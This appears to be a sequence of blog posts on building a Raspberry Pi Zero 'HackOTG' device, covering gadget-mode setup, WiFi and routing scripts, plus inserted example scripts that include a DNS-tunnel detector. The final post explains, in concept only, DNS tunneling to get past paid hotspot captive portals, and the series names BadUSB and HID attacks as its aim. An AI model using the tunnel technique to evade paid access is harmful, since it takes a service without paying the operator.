<p>Log in to your HackOTG over the emulated Ethernet device:</p>
<pre>sudo ifconfig usb0 192.168.7.3 #on your computer (the USB host), not on the Pi
ssh pi@192.168.7.2 #password is "raspberry"</pre>
<p><strong>Activate your Wifi-interface:</strong></p>
<pre>sudo ifconfig wlan0 up</pre>
<p><strong>Scan for available Wifi-Hotspots:</strong></p>
<pre>sudo iwlist wlan0 scan | less</pre>
<h2>Associate with the access point</h2>
<p>There are a couple of different security mechanisms; the scan you just performed shows which one your chosen hotspot uses.</p>
<h3>WEP</h3>
<p>This is one of the <a href="https://en.wikipedia.org/wiki/Wired_Equivalent_Privacy">oldest security mechanisms</a>, with many well-known flaws, but this is how you connect: (replace "testessid" and "safestpasswordever")</p>
<pre>sudo iwconfig wlan0 essid testessid key s:safestpasswordever</pre>
<h3>WPA</h3>
<p>A common security mechanism is <a href="https://en.wikipedia.org/wiki/Wi-Fi_Protected_Access">WPA</a>. WPA has many flavours, but most of them will be accessible with the following steps.</p>
<p><strong>Create a config-file:</strong> (replace “MYSSID” and “passphrase”)</p>
<pre>wpa_passphrase <em>MYSSID passphrase</em> > <em>MYSSID</em>.conf</pre>
<p>This will create a config-file in which the passphrase is turned into a 256-bit PSK (a PBKDF2 hash of the passphrase with the SSID as salt), so the passphrase itself does not have to be stored. Note that <em>wpa_passphrase</em> also writes the plaintext passphrase into the file as a comment line (<em>#psk="..."</em>): delete that line, and keep the file readable only by you, because the hex PSK alone is enough to join the network. If it is a public (unsecured) WiFi, you can create the same file with these contents.</p>
<pre>network={
ssid="MYSSID"
key_mgmt=NONE
}</pre>
<p><strong>To connect:</strong> <em>(replace “interface” and “MYSSID”)</em></p>
<pre>sudo wpa_supplicant -B -i <i>interface</i> -D wext -c <em>MYSSID</em>.conf</pre>
<p>The driver "wext" can be swapped for another driver listed by the "wpa_supplicant -h" command; with the built-in WiFi of the Pi Zero W, "wext" works and so does the newer "nl80211" (the same driver hostapd will use later in this series). The "-B" flag makes wpa_supplicant daemonize and run in the background.</p>
<h2>Requesting an IP</h2>
<p>Now that we are associated and authenticated, we need an IP. We can get it from the DHCP server running on the router with this command:</p>
<pre>sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
<h2>Automate the process</h2>
<p>You can write a bash script, so you can connect to a wifi-hotspot with one command. You can make multiple scripts and config-files to connect to different hotspots.</p>
<pre>sh connect_wifi_ssid.sh</pre>
<p><strong>connect_wifi_ssid.sh:</strong></p>
<pre>sudo wpa_supplicant -B -i wlan0 -D wext -c ssid.conf
sudo dhcpcd --nohook wpa_supplicant wlan0</pre>
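<p>The following is an added example, not part of the original series: a connect script that first cleans up what <em>wpa_passphrase</em> produced. It removes the <em>#psk="..."</em> comment that still holds the plaintext passphrase, makes the file owner-only (the 64-hex PSK is all an attacker needs to join the network), and only then runs the same <em>wpa_supplicant</em> and <em>dhcpcd</em> commands as <em>connect_wifi_ssid.sh</em>. The config path under /home/pi and the "connect" entry point are assumptions; the sample config in the usage below is constructed.</p>

```shell
#!/bin/sh
# Added example, not from the original post. wpa_passphrase writes the derived
# 256-bit PSK (psk=<64 hex>) but also keeps the plaintext passphrase in a comment
# (#psk="..."). Remove that comment and lock the file down before using it; the
# hex PSK alone still lets anyone who can read the file join the network.
# The config path and the "connect" entry point are assumptions.

# Return 0 if FILE holds a usable PSK block (an ssid and a 64-hex psk), else 1.
wpa_conf_ok() {  # wpa_conf_ok FILE
    grep -q '^[[:space:]]*ssid="' "$1" &&
    grep -q '^[[:space:]]*psk=[0-9a-fA-F]\{64\}[[:space:]]*$' "$1"
}

# Count the lines that still leak the plaintext passphrase (0 after hardening).
plaintext_psk_lines() {  # plaintext_psk_lines FILE
    grep -c '^[[:space:]]*#psk=' "$1" || true
}

# Strip the "#psk=" plaintext line in place and make the file owner-only.
harden_wpa_conf() {  # harden_wpa_conf FILE
    f=$1
    wpa_conf_ok "$f" || { echo "$f: no ssid/psk block as written by wpa_passphrase"; return 1; }
    tmp=$(mktemp) || return 1
    # rewrite through a temp file; "cat > $f" keeps the inode and ownership
    sed '/^[[:space:]]*#psk=/d' "$f" > "$tmp" && cat "$tmp" > "$f"
    rm -f "$tmp"
    chmod 600 "$f"
}

# Associate and request a lease, as connect_wifi_ssid.sh does, but only with a
# hardened config. Needs root; runs only as "connect_wifi.sh connect".
connect_wifi() {  # connect_wifi IFACE FILE
    harden_wpa_conf "$2" || return 1
    # try the modern nl80211 driver first and fall back to wext
    wpa_supplicant -B -i "$1" -D nl80211,wext -c "$2" || return 1
    dhcpcd --nohook wpa_supplicant "$1"
}

if [ "${1-}" = "connect" ]; then
    connect_wifi wlan0 /home/pi/MYSSID.conf
fi
```

<p>Usage: <em>wpa_passphrase MYSSID passphrase > MYSSID.conf</em> as before, then <em>sudo sh connect_wifi.sh connect</em>. A config for an open network (key_mgmt=NONE, no psk line) is rejected by <em>harden_wpa_conf</em> on purpose, since there is nothing to protect in it and it should not be run through the PSK path.</p>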
<p>It is a good idea to make a <strong>connect_wifi_HELP.txt</strong> that contains the WEP and wpa_passphrase commands and some guidelines to connect to WEP and WPA networks (so you don't need this article).</p>
<p><strong>connect_wifi_HELP.txt:</strong></p>
<pre>##SCANNING
sudo iwlist wlan0 scan
##WEP
sudo iwconfig wlan0 essid testessid key s:safestpasswordever
##WPA
wpa_passphrase <em>MYSSID passphrase</em> > <em>MYSSID</em>.conf
sudo wpa_supplicant -B -i wlan0 -D wext -c MYSSID.conf
sudo dhcpcd --nohook wpa_supplicant wlan0
#unsecured? change the conf file to:
network={
ssid="MYSSID"
key_mgmt=NONE
}</pre>
<h2>Forwarding the connection</h2>
<p>You can forward the connectivity of your HackOTG to the computer on the emulated Ethernet device by enabling IPv4 forwarding. Forwarding alone is not enough, though: the upstream router knows nothing about the 192.168.7.0/24 link and would not know where to send replies, so the HackOTG also has to NAT (masquerade) the traffic it sends out over wlan0:</p>
<pre>sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE</pre>
<p>On the computer side, point the default route at 192.168.7.2 and give it a DNS server it can reach through that route. This can be handy if you need to register or fill in a form in a captive portal, or if you just need a WiFi connection.</p>
<h2>Checking the internet connection</h2>
<p>You will have 2 active interfaces now. By running the <em>"route -n"</em> command, you can see how your traffic is going to be routed. Sometimes you will want to choose which connection to use for your internet connectivity. You can do that with these scripts:</p>
<p><strong>route_wlan0.sh:</strong> (to direct all traffic through the WiFi-connection)</p>
<pre>sudo route del default
sudo dhcpcd -n wlan0</pre>
<p><strong>route_usb0.sh:</strong> (to direct all traffic the emulated ethernet connection)</p>
<pre>sudo route del default
sudo dhcpcd -n usb0</pre>
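<p>As an added example (not part of the original series), the two route scripts above can be folded into one that reads the <em>route -n</em> table, picks the default route by lowest metric instead of trusting line order, and only runs the disruptive <em>route del default</em> when the uplink really has to change. The "switch" entry point is an assumption, and the routing table used in the usage below is constructed.</p>

```shell
#!/bin/sh
# Added example, not from the original post: decide which interface carries the
# default route from `route -n` output on stdin, by lowest metric rather than by
# line position, and only re-run dhcpcd when the uplink actually has to change.
# The "switch" entry point is an assumption.

# Print the interface of the lowest-metric default route; return 1 if none.
default_iface() {
    # route -n columns: Destination Gateway Genmask Flags Metric Ref Use Iface
    awk 'BEGIN { best = 1e9 }
         $1 == "0.0.0.0" && ($5 + 0) < best { best = $5 + 0; iface = $8 }
         END { if (iface == "") exit 1; print iface }'
}

# Return 0 when IFACE is the current uplink (reads route -n output from stdin).
uplink_is() {  # uplink_is IFACE
    [ "$(default_iface)" = "$1" ]
}

# Switch the default route to IFACE, as route_wlan0.sh/route_usb0.sh do, but
# leave the table alone when IFACE already carries it. Needs root.
use_uplink() {  # use_uplink IFACE
    if route -n | uplink_is "$1"; then
        echo "$1 already carries the default route"; return 0
    fi
    route del default && dhcpcd -n "$1"
}

if [ "${1-}" = "switch" ]; then
    use_uplink "$2"
fi
```

<p>Usage: <em>sudo sh route.sh switch wlan0</em> or <em>sudo sh route.sh switch usb0</em>. To just check, pipe the live table in: <em>route -n | sh -c '. ./route.sh; default_iface'</em>.</p>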
<p>Remember, if you don't have connectivity to the internet, check that the proper interface is on the default-route line (destination 0.0.0.0) at the top of the <em>"route -n"</em> output. Now that we have connectivity, we can update all our software with the following commands:</p>
<pre>sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade</pre>
<p>Great, we can connect to WiFi hotspots now, which we can not only use for an internet connection: if you know the IP (use 'ifconfig') you can also SSH to the HackOTG over WiFi.</p>
<p>Next, we will setup our own WiFi-hotspot, so we don’t have to configure a WiFi-hotspot over the emulated Ethernet-device if we want to SSH to the device over WiFi.</p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="tVHiU01lqM">
<p>
<a href="/2017/10/11/hackotg-v1-3-creating-our-own-hotspot-on-boot/">HackOTG (v1.3): Creating our own hotspot on boot</a>
</p>
</blockquote>Lars Veelaert
HackOTG (v1.1): Integrating the cable for more portability2017-10-10T00:00:00+00:002017-10-10T00:00:00+00:00https://lvlrt.github.io/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability<p><img src="/assets/HackOTG3.jpg" alt="Hackotg complete with usb" /></p>
<p><em>This article is part of a series: <a href="/2017/10/07/hackotg-v1-0-universal-portable-security-platform/">you can find the first article here</a>.</em></p>
<p>Before we start using our device, we have to make sure it is a good form-factor for our purpose and at this point, we will always need a USB-cable attached to the device, to be able to interface with it. In the future we will sometimes want to connect with WiFi so we can use the same connection to emulate different devices for our physical attacks.</p>
<p>No matter what, we will need the cable attached to it, be it for power, connectivity or attack. There are handy connections on the bottom of the Pi zero to make the following process easier. If you don’t want to perform this mod, you don’t need to, but it is very handy and makes the whole platform more compact and portable.</p>
<h2>What do you need?</h2>
<ul>
<li>Soldering iron, solder and tweezers (small wires)</li>
<li>Pi zero</li>
<li>Spare USB-cable</li>
<li>Small zip tie</li>
<li>Knife</li>
<li>Pliers</li>
<li>Glue</li>
</ul>
<h2>Putting it all together</h2>
<p><img src="/assets/rpi_usb.jpg" alt="Rpi USB" /></p>
<p>No surprises here: snip off the USB-A side, strip the black plastic layer from the cable, and you'll find a metallic shielding layer with 4 wires in it (white, green, red, black). Those are 2 data wires and 2 for power. If you make 2 small indentations on both sides of the USB port, you can tie a cable tie around it and through the holes. Pull the cable tie very tight (use pliers) and it won't move anymore.</p>
<p>Solder the wires to the pads with the respective indicated colour on the image below. The wires can be as short as 5cm. You can drop a bit of glue onto the wires to insulate them from each other again.</p>
<p><img src="/assets/solder_pins_rpi.png" alt="Pins rpi" /></p>
<h2>The result and what’s next?</h2>
<p>Now you don’t have to carry a USB-cable together with the Pi, it is already integrated in the device! If you plug it straight into a power source (battery, wall-socket, …) it will boot. And if the device is also a USB-host, it will present itself as an Ethernet-to-USB adapter and we can SSH into it to perform our work. Now we can start using our HackOTG everywhere!</p>
<p><img src="/assets/HackOTG3.jpg" alt="Hackotg complete with usb" /></p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="zjGS1XMwjZ">
<p>
<a href="/2017/10/11/hackotg-v1-2-basic-connectivity-to-internet/">HackOTG (v1.2): Basic connectivity to the internet</a>
</p>
</blockquote>Lars Veelaert
HackOTG (v1.0): A universal, portable, security-platform2017-10-07T00:00:00+00:002017-10-07T00:00:00+00:00https://lvlrt.github.io/2017/10/07/hackotg-v1-0-universal-portable-security-platform<p><img src="/assets/HackOTG.jpg" alt="HackOTG" /></p>
<p><em>When demonstrating a possible attack vector to a friend or a client, you want something standalone that is not influenced by your day-to-day tasks. Many have a persistent <a href="https://www.kali.org/">Kali Linux</a> on a bootable USB-drive exactly for this purpose. There are also many attack-vectors which require physical devices. Exploits like <a href="https://larsveelaert.github.io/2017/10/03/hack-get-free-wifi-on-paid-access-hotspots/">DNS-tunneling</a>, HID-attacks and <a href="https://www.topsec.com/it-security-news-and-info/what-is-badusb-and-should-i-be-scared">BadUSB</a> are only a couple of examples.</em></p>
<p>You can buy specific devices like the <a href="https://hakshop.com/products/usb-rubber-ducky-deluxe">USB rubber ducky</a> to perform these attacks in an easy, portable, quick way. Apart from being quite costly, you can’t carry them all in your everyday backpack, and they often need to be reprogrammed for a different attack on the same vector… So having multiple of them only makes it worse.</p>
<p>I’ve ported a lot of my physical exploits and some wifi-exploits to my Android device. It’s disguised, an all-in-one and you’ll always have it on you. An OTG-cable in my backpack and I’m ready to go… But often a lot of these exploits require a custom kernel or some modules to be able to function. Many tweaks are also device specific. When there is an update, a lot of unexpected things can happen. Not the best solution.</p>
<p>So I was searching for something open-source, portable, inexpensive, expendable, easy-to-mod and easy to interface with and change its behaviour, and I found this:</p>
<p><img src="/assets/Rpizero.png" alt="Rpi Zero on adafruit" /></p>
<p>It is essentially a small stand-alone computer, running Linux off an SD-card. What is cool about this model is that it has WiFi and Bluetooth and a board setup that supports USB-gadget (OTG) mode, which can turn one of the micro-USB ports into whatever USB device you want (HID, Ethernet dongle, mass storage, MIDI, …). It is powered with a normal 5 V micro-USB cable plugged into a USB host or a wall adapter.</p>
<p>We can set it up as a headless device that we can SSH into over WiFi, or, even easier, make it emulate an Ethernet device. The rest of this article describes how to get it to emulate an Ethernet-to-USB controller and how to SSH into it without ever attaching a display.</p>
<h2>Preparing the SD-card</h2>
<p>The software that is best adapted to the hardware is <a href="https://www.raspberrypi.org/documentation/raspbian/">Raspbian</a>. You can try the same steps on other ARM distros, but from my experience they lack a lot of support for OTG. The idea is to make a very-easy-to-recreate setup, so if it is not your favourite flavour of Linux, no worries.</p>
<p>There are <a href="https://www.raspberrypi.org/documentation/installation/installing-images/">many ways to install Raspbian</a>, but you basically download the <a href="https://en.wikipedia.org/wiki/Disk_image">disk image</a> and write it to the SD-card. If your SD-card is bigger than the original disk image, expand the partition to its full size. This article walks through doing this on Linux.</p>
<p>An SD-card in a Raspberry Pi consists of one small FAT partition with the boot files and one large EXT4 partition. Recreating the partition table and copying the right files onto each will also give you a working system (but Raspbian gives you a ready disk image).</p>
<p><strong>Download the Raspbian Lite image:</strong> (You don’t need the full one)</p>
<p><img src="/assets/raspian_download.png" alt="Raspbian Download" /></p>
<pre>wget https://downloads.raspberrypi.org/raspbian_lite_latest
unzip raspbian_lite_latest #will unzip an .img file</pre>
<p><strong>Flash your SD-card:</strong></p>
<p>Plug your SD-card into your PC with a card reader. Your SD-card size and type matter, but are not that important. You want a fast one (indicated by its class, 10 is best) and anything above 2 GB will work well if using the Lite image. If you deploy this somewhere and it has to record or log something, make sure that it has the disk space to do so. At the time of writing a quality SD-card of 32 GB is 20 EUR, so that would bring the total cost to ~30 EUR excluding cables (which you probably have too many of).</p>
<p><span style="text-decoration: underline;">Double-check before running these commands!</span></p>
<pre>fdisk -l #lookup the device name of your SD-card (ex. /dev/mmcblk1)</pre>
<pre class="output">Disk <strong>/dev/mmcblk1</strong>: 29.8 GiB, 32026656768 bytes, 62552064 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x00000000
Device Boot Start End Sectors Size Id Type
/dev/mmcblk1p1 8192 62552063 62543872 29.8G c W95 FAT32 (LBA)</pre>
<pre>dd bs=4M if=2017-09-07-raspbian-stretch-lite.img of=/dev/mmcblk1 conv=fsync #change /dev/mmcblk1</pre>
<pre class="output">442+1 records in
442+1 records out
1854590976 bytes (1.9 GB, 1.7 GiB) copied, 99.8628 s, 18.6 MB/s</pre>
<p><strong>Resize partition to full disk: </strong><em>(Optional)</em></p>
<pre>fdisk /dev/mmcblk1 #change /dev/mmcblk1 to your device</pre>
<pre class="output">Welcome to fdisk (util-linux 2.30.2).
Changes will remain in memory only, until you decide to write them.
Be careful before using the write command.
<strong>Command (m for help): p</strong>
Disk /dev/mmcblk1: 29.8 GiB, 32026656768 bytes, 62552064 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x11eccc69
Device Boot Start End Sectors Size Id Type
/dev/mmcblk1p1 8192 93813 85622 41.8M c W95 FAT32 (LBA)
/dev/mmcblk1p2 94208 62552063 62457856 29.8G 83 Linux
<strong>Command (m for help): d</strong>
<strong>Partition number (1,2, default 2): 2</strong>
Partition 2 has been deleted.
<strong>Command (m for help): n</strong>
Partition type
p primary (1 primary, 0 extended, 3 free)
e extended (container for logical partitions)
<strong>Select (default p): p</strong>
<strong>Partition number (2-4, default 2): 2</strong>
<strong>First sector (2048-62552063, default 2048): 94208</strong>
Last sector, +sectors or +size{K,M,G,T,P} (94208-62552063, default 62552063):
Created a new partition 2 of type 'Linux' and of size 29.8 GiB.
Partition #2 contains a ext4 signature.
<strong>Do you want to remove the signature? [Y]es/[N]o: n</strong>
<strong>Command (m for help): w</strong>
The partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.</pre>
<p>At this point you will have a working operating system.</p>
<h2>Configuring the device</h2>
<p>Now that you have a working image, it is time to edit a few configuration files so that you can connect to the device. This is achieved by configuring the OTG port (the micro-USB port marked “USB”) to emulate an Ethernet-to-USB dongle. With a working connection, we will be able to log in through SSH.</p>
<p><strong>Mount both partitions:</strong></p>
<pre>mkdir boot
mount /dev/mmcblk1p1 boot
mkdir root
mount /dev/mmcblk1p2 root</pre>
<p><strong>Setup USB-gadget, Ethernet-to-USB:</strong></p>
<p>Add a line to boot/config.txt, using this command:</p>
<pre>echo 'dtoverlay=dwc2' >> boot/config.txt</pre>
<p>After the parameter ‘rootwait’ in boot/cmdline.txt add the following parameter (the file must stay a single line):</p>
<pre># boot/cmdline.txt
... rootwait modules-load=dwc2,g_ether ...</pre>
<p>This loads the needed kernel modules and emulates an Ethernet-to-USB device on the USB port. You could also change this after the device has booted, but we have no other way of accessing the device, so we want this behaviour from the first boot.</p>
<p><strong>Configure a static IP:</strong></p>
<p>Open the file root/etc/network/interfaces and add the following snippet to the end of the file:</p>
<pre># root/etc/network/interfaces
allow-hotplug usb0
iface usb0 inet static
address 192.168.7.2
netmask 255.255.255.0
network 192.168.7.0
broadcast 192.168.7.255
gateway 192.168.7.1</pre>
<p>When the device is connected through its emulated Ethernet interface, we know its IP in advance, without needing a DHCP server or a discovery service.</p>
<p><strong>Enable SSH-server (headless way):</strong></p>
<p>The SSH server was enabled by default on early versions, but that was <a href="https://www.raspberrypi.org/documentation/remote-access/ssh/">a security issue</a> for many people who were not aware of it. To still make the feature easy to enable headlessly, you can put an empty file named ‘ssh’ on the boot partition and it will be enabled for you (the file is removed after the first boot).</p>
<pre>touch boot/ssh</pre>
<p><strong>Unmount the SD-card:</strong></p>
<pre>sync
umount boot root</pre>
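<p>The four edits above (config.txt, cmdline.txt, the interfaces file and the ssh flag file) are easy to get subtly wrong by hand, for example by appending a second <code>modules-load=</code> parameter or breaking cmdline.txt into two lines. The script below is an added example, not part of the original post: it applies the same changes to an already mounted boot and root partition, and is idempotent, so running it twice against the same card changes nothing the second time. The directory names <code>boot</code> and <code>root</code> are the mount points from the article; everything else (function names, the constructed sample files in the usage) is an assumption of this example.</p>
<pre>python3 provision_otg.py boot root</pre>

```python
"""Headless provisioning of a mounted Raspbian SD-card for Ethernet-over-USB gadget mode.

Added example (not the article's own code). Assumes the FAT boot partition is mounted at
BOOT_DIR and the ext4 root partition at ROOT_DIR, as in the article's mount commands.
"""
from pathlib import Path

DWC2_OVERLAY = "dtoverlay=dwc2"
GADGET_MODULES = "modules-load=dwc2,g_ether"

# Same static address as the article; usb0 is the Pi's side of the two-host link.
USB0_STANZA = """
# usb0: emulated Ethernet-over-USB link, fixed address so no DHCP is needed
allow-hotplug usb0
iface usb0 inet static
    address 192.168.7.2
    netmask 255.255.255.0
    network 192.168.7.0
    broadcast 192.168.7.255
    gateway 192.168.7.1
"""


def _append_line(path: Path, line: str) -> None:
    """Append one line, making sure it lands on its own line even if the file lacks a final newline."""
    existing = path.read_text() if path.exists() else ""
    prefix = "" if (existing == "" or existing.endswith("\n")) else "\n"
    with path.open("a") as fh:
        fh.write(prefix + line + "\n")


def enable_dwc2_overlay(boot_dir: Path) -> bool:
    """Add dtoverlay=dwc2 to config.txt. Returns True when the file was changed."""
    cfg = boot_dir / "config.txt"
    lines = cfg.read_text().splitlines() if cfg.exists() else []
    if DWC2_OVERLAY in (l.strip() for l in lines):
        return False
    _append_line(cfg, DWC2_OVERLAY)
    return True


def add_gadget_modules(boot_dir: Path) -> bool:
    """Insert modules-load=dwc2,g_ether right after 'rootwait'; cmdline.txt must stay one line."""
    cmd = boot_dir / "cmdline.txt"
    params = cmd.read_text().strip().split()
    if any(p.startswith("modules-load=") for p in params):
        return False  # a modules-load parameter is already there; never add a second one
    if "rootwait" not in params:
        raise ValueError("cmdline.txt has no 'rootwait' parameter; refusing to guess a position")
    params.insert(params.index("rootwait") + 1, GADGET_MODULES)
    cmd.write_text(" ".join(params) + "\n")
    return True


def configure_usb0(root_dir: Path) -> bool:
    """Append the static usb0 stanza to /etc/network/interfaces unless usb0 is already defined."""
    ifaces = root_dir / "etc" / "network" / "interfaces"
    if ifaces.exists() and "iface usb0" in ifaces.read_text():
        return False
    ifaces.parent.mkdir(parents=True, exist_ok=True)
    with ifaces.open("a") as fh:
        fh.write(USB0_STANZA)
    return True


def enable_ssh(boot_dir: Path) -> bool:
    """Create the empty 'ssh' flag file that makes Raspbian start sshd on first boot."""
    flag = boot_dir / "ssh"
    if flag.exists():
        return False
    flag.touch()
    return True


def provision(boot_dir, root_dir) -> dict:
    """Apply all four changes; the returned dict says which files were actually modified."""
    boot_dir, root_dir = Path(boot_dir), Path(root_dir)
    return {
        "config.txt": enable_dwc2_overlay(boot_dir),
        "cmdline.txt": add_gadget_modules(boot_dir),
        "interfaces": configure_usb0(root_dir),
        "ssh": enable_ssh(boot_dir),
    }


if __name__ == "__main__":
    import sys
    print(provision(sys.argv[1], sys.argv[2]))
```

<p>Run it as root after the mount commands and before <code>sync</code>/<code>umount</code>. The second run returning all <code>False</code> is the check that the card is in the expected state.</p>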
<h2>Using the device</h2>
<p>If everything is set up correctly, you can use a micro-USB to USB-A (regular charging cable) to connect your device with the “USB” marked port to your computer (or any other device with a terminal). The connection will give both a 5V power and a data-connection to your Pi. After plugging the device in, the ACT light will start blinking if the SD-card has a bootable operating system on it. The first time the boot up process will take longer, but normally this takes about 10 seconds.</p>
<p><img src="/assets/HackOTG.jpg" alt="HackOTG" /></p>
<p>On Linux, you can check your interfaces by issuing the command:</p>
<pre>ifconfig</pre>
<p>If everything is working properly, you’ll see this new interface:</p>
<pre class="output">...
usb0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt; mtu 1500
inet6 fe80::a8ac:4ff:fe31:3a2e prefixlen 64 scopeid 0x20
ether aa:ac:04:31:3a:2e txqueuelen 1000 (Ethernet)
RX packets 28 bytes 3312 (3.2 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 5 bytes 734 (734.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
...</pre>
<p>To be able to SSH to the device we need an IP address ourselves. There is no DHCP server on this two-host network, so we assign one by hand, in the same subnet. Use this command (you’ll have to do this every time you plug in the device):</p>
<pre>ifconfig usb0 192.168.7.3</pre>
<p>Now you can SSH to the device with the default credentials (user: pi, pass: raspberry). Change that password with <code>passwd</code> on the first login: the device will later be plugged into other people’s machines, and a reachable SSH server with the well-known default password is exactly the issue that made Raspbian disable SSH by default.</p>
<pre>ssh pi@192.168.7.2</pre>
<h2>What next?</h2>
<p>Now that we have the basics figured out, in the next version we will hack the hardware to make the device include a USB-port so it is truly portable.</p>
<p>In the rest of the series we will start building our universal hacking/debugging tool so we can connect to it over WiFi and use its emulation capabilities to demonstrate physical attack-vectors.</p>
<p><em>You can find the next one here:</em></p>
<blockquote class="wp-embedded-content" data-secret="HpdD86nrmQ">
<p>
<a href="/2017/10/10/hackotg-v1-1-integrating-the-cable-for-more-portability/">HackOTG (v1.1): Integrating the cable for more portability</a>
</p>
</blockquote>Lars Veelaert
Hack: Get free WiFi on paid-access hotspots with a DNS tunnel2017-10-03T00:00:00+00:002017-10-03T00:00:00+00:00https://lvlrt.github.io/2017/10/03/hack-get-free-wifi-on-paid-access-hotspots<p><img src="/assets/dns-tunnel-monitoring.png" alt="header" /></p>
<p>Everybody knows that you can’t connect to a WiFi hotspot if it is secured and you don’t have the password. But at airports, train stations or homes with a router from a big provider you will find an unsecured WiFi hotspot; when you connect to it and open your browser, you get prompted to log in, supply a credit card, etc. Great if you have a login, but otherwise you are stuck behind this <a href="https://en.wikipedia.org/wiki/Captive_portal">‘captive’ portal</a> (that is what this page is called).</p>
<h2>How to bypass a captive portal</h2>
<p>Often you can bypass a captive portal page by using DNS tunneling. You can test whether this attack is possible by trying to ping google.com. Try this command:</p>
<pre>ping www.google.com</pre>
<pre class="output">[root@localhost ~]# ping www.google.com
PING www.google.com (172.217.17.36) 56(84) bytes of data.</pre>
<p>You don’t need to get a ping reply back, but you can see that www.google.com resolved to 172.217.17.36. This means that DNS is still working… strange if you don’t have an internet connection, right?</p>
<p>So <a href="https://nl.wikipedia.org/wiki/Domain_Name_System">DNS</a> is still working. If we give the router a domain name, it resolves it by sending the query to a nameserver, which keeps following the chain of nameservers until it finds the IP, which is then sent back to us. Now if you specify a <a href="https://en.wikipedia.org/wiki/Subdomain">subdomain</a> (“mail” in mail.google.com), the resolver asks the nameserver responsible for that subdomain (if one is delegated) for the right IP and relays the answer back.</p>
<p>This means that if we control the subdomain we are looking up, and we control the nameserver associated with it, we decide which IP (or better, which <a href="https://en.wikipedia.org/wiki/List_of_DNS_record_types">DNS record</a>) is sent back. The result is that we can upload data encoded in an extra label prepended to the subdomain and download data encoded in the DNS record that is sent back. This process is called DNS tunneling. Several tools implement this encoding, but <a href="http://code.kryo.se/iodine/">iodine</a> is a great one, and it is the one used in this article.</p>
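<p>The same properties that make the channel work (data carried in long, high-entropy leftmost labels, many unique names under one delegated zone, and query types such as NULL that ordinary clients almost never send, as the iodine output later in this article shows) are what make it visible in resolver logs. The script below is an added example, written from the operator’s side, not part of the original post: it parses a small set of constructed dnsmasq-style query-log lines and scores each (client, zone) pair on those features. The log format, the thresholds and the domain <code>t.example.net</code> are assumptions of this example, not values from the article.</p>

```python
"""Score resolver query logs for DNS-tunnel-like traffic (added example, defender's side)."""
import math
import re
from collections import Counter, defaultdict

# Constructed sample log lines (not real traffic) in a dnsmasq-like shape:
#   "<time> query[<TYPE>] <name> from <client>"
SAMPLE_LOG = """\
12:00:01 query[A] www.google.com from 192.168.1.23
12:00:02 query[AAAA] www.google.com from 192.168.1.23
12:00:03 query[NULL] 0aWxjZ4lkm3n8qpr7tuv2xyzab9cd1efghijkl.t.example.net from 192.168.1.23
12:00:03 query[NULL] 0bQ2mn7pstu9vwxy4zab1cdefg8hijklmnop3qr.t.example.net from 192.168.1.23
12:00:04 query[NULL] 0cZ8lmno1pqrs6tuvw2xyza9bcdefghijkl4mnop.t.example.net from 192.168.1.23
12:00:04 query[NULL] 0dK5pqrs2tuvw7xyza1bcde8fghijklmnop9qrst.t.example.net from 192.168.1.23
12:00:05 query[A] mail.google.com from 192.168.1.24
12:00:06 query[A] cdn.example.org from 192.168.1.24
12:00:07 query[TXT] _dmarc.example.org from 192.168.1.24
"""

LOG_RE = re.compile(r"^\S+ query\[(?P<qtype>\w+)\] (?P<qname>\S+) from (?P<client>\S+)$")
# Query types that carry a large payload in the answer and are rare from normal clients.
TUNNEL_QTYPES = {"NULL", "TXT"}


def label_entropy(label: str) -> float:
    """Shannon entropy (bits per character) of one DNS label; encoded data scores high."""
    if not label:
        return 0.0
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in Counter(label).values())


def parse_log(text: str):
    """Yield (qtype, qname, client) for every line that matches the assumed log format."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.group("qtype").upper(), m.group("qname").rstrip("."), m.group("client")


def analyze(text: str, min_queries: int = 3, min_label_len: int = 20,
            min_entropy: float = 3.5, min_rare_fraction: float = 0.8) -> dict:
    """Group queries by (client, zone) and compute per-group tunnel indicators."""
    groups = defaultdict(list)  # (client, zone) -> [(qtype, leftmost label), ...]
    for qtype, qname, client in parse_log(text):
        first, _, zone = qname.partition(".")
        if not zone:
            continue  # single-label names carry no zone to group on
        # Keep the leftmost label's case: iodine's encodings are case-sensitive.
        groups[(client, zone.lower())].append((qtype, first))

    report = {}
    for key, entries in groups.items():
        n = len(entries)
        mean_len = sum(len(label) for _, label in entries) / n
        mean_ent = sum(label_entropy(label) for _, label in entries) / n
        rare = sum(1 for qtype, _ in entries if qtype in TUNNEL_QTYPES) / n
        # All indicators must agree: a single TXT lookup (e.g. _dmarc) is not a tunnel.
        suspicious = (n >= min_queries and mean_len >= min_label_len
                      and mean_ent >= min_entropy and rare >= min_rare_fraction)
        report[key] = {
            "queries": n,
            "mean_label_len": round(mean_len, 1),
            "mean_entropy": round(mean_ent, 2),
            "rare_qtype_fraction": round(rare, 2),
            "suspicious": suspicious,
        }
    return report


def flagged(text: str, **thresholds) -> list:
    """Sorted list of (client, zone) pairs that trip every indicator."""
    return sorted(k for k, v in analyze(text, **thresholds).items() if v["suspicious"])


if __name__ == "__main__":
    for key, stats in analyze(SAMPLE_LOG).items():
        print(key, stats)
    print("flagged:", flagged(SAMPLE_LOG))
```

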